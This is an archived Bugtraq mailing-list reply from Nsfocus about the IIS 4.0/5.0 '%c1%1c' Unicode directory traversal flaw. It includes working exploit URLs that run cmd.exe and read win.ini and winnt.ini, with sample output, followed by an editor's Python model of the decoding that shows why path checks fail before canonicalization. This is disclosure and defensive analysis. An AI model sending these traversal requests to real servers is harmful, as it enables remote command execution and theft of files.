Bugtraq mailing list archives
Re: IIS %c1%1c remote command execution
From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Wed, 18 Oct 2000 15:35:31 +0800
We found this bug several weeks ago. When we were ready to report it to Microsoft, we found it had already been posted to BugTraq.

A member of our team disassembled the IIS 5.0 (Chinese version) Unicode decoding implementation and found a strange decoding method: when IIS finds "%c1%hh" or "%c0%hh" (0x00 <= 0xhh < 0x40), IIS will decode "%c1%hh" to (0xc1 - 0xc0) * 0x40 + 0xhh, and "%c0%hh" to (0xc0 - 0xc0) * 0x40 + 0xhh.

Example (Windows 2000 + IIS 5.0 + SP1, Simplified Chinese version):

http://192.168.8.48/A.ida/%c1%00.ida
IIS said "@.ida" can't be found. Here: (0xc1-0xc0)*0x40+0x00 = 0x40 = '@'

http://192.168.8.48/A.ida/%c1%01.ida
IIS said "A.ida" can't be found. Here: (0xc1-0xc0)*0x40+0x01 = 0x41 = 'A'

http://192.168.8.48/A.ida/%c1%02.ida
IIS said "B.ida" can't be found.
....

http://192.168.8.48/A.ida/%c0%21.ida
IIS said "!.ida" can't be found.
...

It means you can encode most characters with this feature. For example:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

We guess that we can use it to bypass some directory restrictions:

(1) http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

Now we get:

 Directory of d:\inetpub\scripts

2000-09-28  15:49       <DIR>          .
2000-09-28  15:49       <DIR>          ..
1999-07-21  17:49             147,456  Count.exe
2000-09-12  17:08             438,290  Count25.exe
2000-10-13  15:03               8,867  counter.err
2000-08-23  23:07             160,002  counter.exe
1999-05-25  18:14               3,925  CountNT.html
1999-07-21  17:49              64,512  extdgts.exe
2000-08-10  15:24              46,352  ism.dll
1999-07-21  17:49              64,512  mkstrip.exe
1999-05-25  18:18               1,317  README.txt
2000-09-28  15:49       <DIR>          wcount
               9 File(s)        935,233 bytes

(2) We can get the content of some system files with this bug too:

http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

IIS deems it to be a request for a .ASP file. It will call asp.dll to open the file win.ini.

For IIS 4.0 + SP6 (Chinese), the URL above failed. It seems that IIS is getting smarter.
But we found it interesting that we can use this malformed URL to trick IIS into giving us winnt.ini:

http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini

"default.asp" should be an existing .ASP file. "a.exe" is a random .EXE file name; it can be a nonexistent file.

It looks like the English version of IIS 4.0/5.0 has a different decoding implementation.

---Original Message---
Recently I received an email from Par Osterberg that directed my attention to a post in the Packetstorm forums: http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&uname=anonymous&datopic=Windows&mesgcheck=defined&gum=474&editoron=
[...]
- rain forest puppy
Regards, Nsfocus Security Team <security () nsfocus com> http://www.nsfocus.com
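Editor's note: the following is an added worked example, not code from the Nsfocus post, from rain forest puppy, or from IIS. It models the decoding rule the post reports ("%c1%hh" / "%c0%hh" with 0x00 <= hh < 0x40 decodes to (lead - 0xc0) * 0x40 + hh) as a small Python function, and then shows the security-relevant point behind the URLs above: a traversal check that runs after ordinary percent-decoding but before this second, lenient decode sees a harmless-looking segment "..\xc1\x1c..", while the filesystem later sees "..\..". The byte values the post's arithmetic produces are 0x5c (backslash) and 0x2f (forward slash), both of which Windows treats as path separators. The decode function, the two check functions and the sample request paths are the editor's own constructions for illustration; the sample paths are the ones quoted in the thread with the query string removed.

```python
from urllib.parse import unquote_to_bytes


def iis_lenient_decode(path: str) -> bytes:
    """Percent-decode PATH, then apply the decoding rule reported in the post.

    A byte 0xC0 or 0xC1 followed by a byte in 0x00..0x3F becomes
    (lead - 0xC0) * 0x40 + trail.  This is a hypothetical model of the
    reported behaviour written for this example, not IIS's own code.
    """
    raw = unquote_to_bytes(path)
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and raw[i + 1] < 0x40:
            out.append((b - 0xC0) * 0x40 + raw[i + 1])
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def climbs_above_root(decoded: bytes) -> bool:
    """Walk path segments; True if ".." ever climbs above the web root.

    Both '/' and '\\' are treated as separators, as the Windows filesystem does.
    """
    depth = 0
    for seg in decoded.replace(b"\\", b"/").split(b"/"):
        if seg == b"..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != b".":
            depth += 1
    return False


def check_before_canonicalize(path: str) -> bool:
    """The failing pattern: check traversal after ordinary %-decoding only.

    The bytes 0xC1 0x1C are still inside the segment "..\xc1\x1c..", so the
    segment is not equal to ".." and the check does not fire.
    """
    return climbs_above_root(unquote_to_bytes(path))


def check_after_canonicalize(path: str) -> bool:
    """The sound pattern: fully canonicalize (including the lenient form), then check."""
    return climbs_above_root(iis_lenient_decode(path))


# Constructed request paths taken from the URLs quoted in the thread.
SAMPLE_PATHS = [
    "/scripts/..%c1%1c../winnt/system32/cmd.exe",
    "/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini",
    "/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini",
    "/scripts/../../winnt/system32/cmd.exe",   # plain traversal, caught either way
    "/scripts/ism.dll",                        # benign request
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p!r}")
        print(f"  decoded:       {iis_lenient_decode(p)!r}")
        print(f"  before-check:  {check_before_canonicalize(p)}")
        print(f"  after-check:   {check_after_canonicalize(p)}")
```

Running the script shows the three "%c1%1c" paths passing the before-decode check and failing the after-decode one, while the plain "../../" path is rejected by both. The general lesson is the one this thread became known for: every decoding step the filesystem (or any later consumer) will apply must be applied before the access check, or the check is comparing against a different string than the one that is eventually opened.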
Current thread:
- IIS %c1%1c remote command execution rain forest puppy (Oct 17)
- Re: IIS %c1%1c remote command execution Florian Weimer (Oct 18)
- Re: IIS %c1%1c remote command execution rain forest puppy (Oct 19)
- [LoWNOISE] addendum %c1%1c IIS 4.0/5.0 Remote command execution ET LoWNOISE (Oct 20)
- Re: IIS %c1%1c remote command execution rain forest puppy (Oct 19)
- <Possible follow-ups>
- Re: IIS %c1%1c remote command execution Nsfocus Security Team (Oct 18)
- Re: IIS %c1%1c remote command execution Cris Bailiff (Oct 19)
- Re: IIS %c1%1c remote command execution Florian Weimer (Oct 18)